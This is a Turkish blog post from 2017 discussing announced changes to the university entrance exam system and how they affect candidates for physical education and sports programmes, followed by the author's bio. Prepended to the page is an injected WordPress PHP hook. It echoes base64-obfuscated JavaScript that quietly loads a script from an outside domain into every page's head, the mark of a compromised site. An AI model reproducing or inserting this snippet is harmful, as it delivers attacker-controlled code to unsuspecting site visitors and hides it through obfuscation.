function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Yeni Üniversite Sistemi Ne Zaman Devreye Girecek? Değişen Sistemin Besyo'culara Etkisi Nedir? – Besyo Hakkında Güncel Bilgiler

Yeni Üniversite Sistemi Ne Zaman Devreye Girecek? Değişen Sistemin Besyo’culara Etkisi Nedir?

26 Eylül 2017
Genel
3 3
Bizi İnstagram 'da Takip Et Bizi YouTube 'ta Takip Et Bizi Facebook 'ta Takip Et

Güncel gelişmelerden haberdar olmak,  canlı yayınlarımızda bizlere sorular sormak, videolarımızı takip etmek ve son dakika gelişmelerini bildirim olarak almak için sağ taraftan sosyal medya hesaplarımızı takip edip tamamen ücretsiz uygulamamızı indirebilirsiniz.

Her yıl Ocak ayında ÖSYS kılavuzu yayımlanır ve adaylar bu kılavuzun esaslarına göre sınava girerler. Öncelikle bu yazımızda yapacağımız her açıklama tamamen söylenilenlere karşı elde ettiğimiz düşüncelerdir. Kesin herhangi bir şeyin açıklama gelmezse Ocak Ayından önce bilinmesi mümkün değildir.

Öncelikle sayın başkanın açıklamaları üzerinden tek tek gidelim

BİR HAFTA SONUNDA BİTECEK

“Bilindiği üzere şu an uygulanmakta olan giriş sistemi iki aşamalı olarak gerçekleştirilmekte. Sınavların ilki mart, diğeri haziran ayında ve toplam 5 gün sürmektedir. Neredeyse 4 aya yayılan bu durum lise eğitimini olumsuz etkilemektedir. Yeni düzenleme ile sınavı bir hafta sonunda başlayıp, bitirmeyi planlamaktayız” ifadelerini kullandı.

Burada benim anladığım net ifade YGS-LYS kalkmayacak ve sınav bir hafta sonunda başlayıp, bitecektir.  Bu da şüphesiz hedefi gerçekten Besyo olan arkadaşlarımız için çok olumlu bir gelişmedir. Çünkü, hedefi Besyo olan arkadaşlar Mart ayına kadar YGS çalışıp akabinde antrenman yapıyordu ve Nisan Mayıs Haziran Aylarında antrenman yapıp Haziran’ın 15’inden sonra başlayan özel yetenek sınavlarına giriyor ve zorlanıyorlardı. Şüphesiz bu durumda antrenörler mevcut süreçte periyotlamayı oluştururken sıkıntı yaşıyorlardı. Eğer böyle olursa bu durum ortadan kalkacaktır.

PUAN TÜRLERİ DEĞİŞECEK

Diğer önemli değişikliğin ise puan türlerinde gerçekleşeceğini belirten Saraç, “Şu an var olan 18 puan türü aslında programların aradığı yeterlilikleri sağlamak açısından önemli bir işlev görmekte ise de bu kadar puan türü yönetilmesi gereken süreci zorlaştırmakta. Ayrıca, bazı programlar için aday havuzunu daraltmakta, ilaveten bazı puan türleri arasında da akademik farklılık zaten çok az olarak ortaya çıkmakta. Bundan dolayı bu 18 puan türünü de azaltmaya gidiyoruz.

Bu durum yalnızca Tercihle alan Besyo’ları etkileyecektir. Bunların başında da mevcut sistemde Öğretmenlik bölümüne LYS’de 240.000 ile öğrenci alan tek üniversite olan Kocaeli Üniversitesi yer almaktadır. Biz Beden Eğitimi ve Spor Öğretmenliği dahil Antrenörlük ve Spor Bilimleri bölümlerinin ÖSYM Tercihiyle alınmasına tamamen karşı bir platformuz.

PEKİ BU SİSTEM NE ZAMAN İÇİN GEÇERLİ OLACAK?

 Yazımızın başında belirtiğimiz gibi her yıl, o yılın sistemi Ocak ayında açıklanan ÖSYS kılavuzunda ilan edilir. Bizim burada yapacağımız her açıklama yapılan açıklamaları yorumlamamızdan ibarettir. Bu kapsamda bizim anladığımız kadarıyla değişiklikler bu yılı kapsayacaktır.

YGS 240.000 BARAJI NE OLACAK?

Kelimenin tam anlamıyla Allah’a emanet giden eğitim sistemimizde herhangi bir stabilitenin söz konusu olmaması bu noktada da her türlü eleştiriyle karşılaşması bizi derinden üzmektedir. Zira bir gün birinin aklına bir şey geldiğinde diğer gün hemen devreye girebiliyor. Sürekli sistem değişiyor. Bu kapsamda da devreye giremeden kalkan bir sistem olarak Beden Eğitimi Ve Spor Öğretmenliği YGS 240.000 Şartı devreye girebilir. Ancak Resmi olarak yapılan açıklamalara göre Öğretmenlik Bölümü YGS 240.000 bu yıl olacaktır. Bu konuda resmi evrağı hemen yazımızın altına ekledik.

Bir çok akademisyenle görüştük hepsi bu duruma karşı, aklı başında olan herkes duruma karşı ve bende YGS 240.000 barajının olmayacağını ve yürürlüğe girmeden iptal edileceğini düşünen tayfadayım.

240.000 Şartı İle İlgili Belgeler 0
http://www.instagram.com/alp.besyocuyuz

1993 yılında Bursa'da doğdum. Küçük yaşlarda spora merak salmaya başladım. Ailemin de desteğiyle çok küçük yaşlarda spora başladım. 2012 yılında Kastamonu Üniversitesi spor yöneticiliği bölümünü kazandım. Kastamonu'yu çeşitli sebeplerle bırakıp. 2015 yılında tekrar sınava girip Ankara Üniversitesi Antrenörlük bölümünü kazandım. 2017 Yılında Uludağ üniversitesine geçiş yaptım

Bir Cevap Yazın

Menü